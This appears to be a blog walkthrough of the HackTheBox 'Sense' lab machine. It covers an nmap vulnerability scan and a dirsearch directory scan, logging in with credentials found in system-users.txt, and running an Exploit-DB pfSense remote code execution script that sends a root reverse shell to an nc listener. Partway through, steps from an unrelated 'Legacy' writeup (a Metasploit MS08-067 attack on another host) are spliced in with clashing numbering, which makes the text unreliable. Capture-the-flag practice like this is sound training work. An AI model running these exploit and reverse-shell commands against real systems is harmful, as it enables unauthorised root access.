Blogs / HackTheBox – Sense Writeup

HackTheBox – Sense Writeup

clock-img 26 Oct, 2021 
cat-img HackTheBox Writeups

Table Of Contents

1. HackTheBox – Sense Writeup

2. Connecting to HTB Vpn

3. Scanning

4. Enumeration

5. Gaining Access

HackTheBox – Sense Writeup

Sense is a beginner level FreeBSD machine released on 21 October 2017. The machine resides at 10.10.10.60. It has a webserver running pfsense firewall which has a remote code execution vulnerability. This vulnerability gives us direct root access into the machine.

HackTheBox - Sense Writeup

Connecting to HTB Vpn:

1. First download the vpn file from the access page of hackthebox.eu

2. Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4. You can access the machine at 10.10.10.60

Scanning:

1. Let’s start by performing a nmap scan our target at 10.10.10.60

nmap -sV -A -p- –script vuln 10.10.10.60

-sV : to get the service versions on each port

-A : to get information such as os details, traceroutes,ports etc

-p- : to scan all 65535 ports

–script vuln : to check for most common vulnerabilities

We get the following details from our scan

Sense Writeup walkthrough

Certified Ethical Hacking

Enroll Now

Enumeration:

2. We can see that only two port 80 and 443 are open

3. Since port 80 is open let’s navigate to the web server using our browser

4. On the home page we can see a login page with ‘pfsense’ banner

HTB sense writeup

5. Lets research more about pfsense using google. During my research I came to know that the default credentials for pfsense are admin:pfsense

6. But i tried those credentials and it did not log in. I also found out that pfsense has a remote command execution exploit which will give a shell but we need the credentials for the exploit to work

7. Since we are stuck here, let’s run a directory scan on the web server and check if there are any hidden directories or files.

I am using a tool called dirsearch and the dirbuster medium wordlist. You can use any directory scanner to achieve this. Dirb and Dirbuster are some of the inbuilt directory scanners in kali

python3 dirsearch.py -w
/usr/share/wordlists/directory-list-2.3-medium.txt -u 10.10.10.60 -E -i 200

-w : to specify the wordlist

-u : to specify the web server

-E : to check for most common extensions

-i : to show only results with 200 status code

Dirsearch URL : https://github.com/maurosoria/dirsearch

8. The results of the directory scanning tells us that there is file called system-users.txt, so let’s check that out using our browser

Sense machine write-up

9. The file says the username is rohit and the password is the default, so it must be pfsense. With these credentials, we are able to log in to the pfsense application

10. From our research about pfsense we had found a python exploit which gives us remote code execution on the system

URL: https://www.exploit-db.com/exploits/43560

11. So let’s download this exploit and use it

6. We can see that there is a single exploit and that too a remote code execution so let’s choose this one

use exploit/windows/smb/ms08-067_netapi

7. After choosing the exploit w have to set the remote port and remote hosts which are going to attack

set RHOST 10.10.10.4

set RPORT 445

8. You can check whether all the options are properly set

show options

9. Now lets run our exploit with the following command

exploit

Legacy Writeup

10. Now we have a meterpreter shell on the system. Sometime it may take one to three tries for the exploit to work

11. You can who you are on the system by the meterpreter command

getuid

So now we are NT System that is we are the Administrator

12. After enumerating the system more you can see that the user flag is located in the desktop of the user john and the root flag is located at the desktop of the administrator

Thank You for Reading HackTheBox – Legacy Writeup

Don’t forget to check out our latest Blogs – HackTheBox – Sense Writeup

Gaining Access:

12. To use the exploit type the following command but replace the lhost,lport,rhost values with your values

python3 43560.py –rhost=10.10.10.60 –lhost=10.10.14.20 lport=1111
–username=rohit –password=pfsense

Before running the exploit set a netcat listener to catch the reverse connection on port 1111

nc -lvp 1111

13. Now lets run the exploit

Sense Writeup walkthrough

14. We can see that we got a reverse shell on our netcat listener and that too as root

whoami

Sense Writeup,HTB sense writeup,Sense

Don’t forget to check out our latest Blogs – TryHackMe Tomghost-Writeup

Courses

Training Calender

WhatsApp

Phone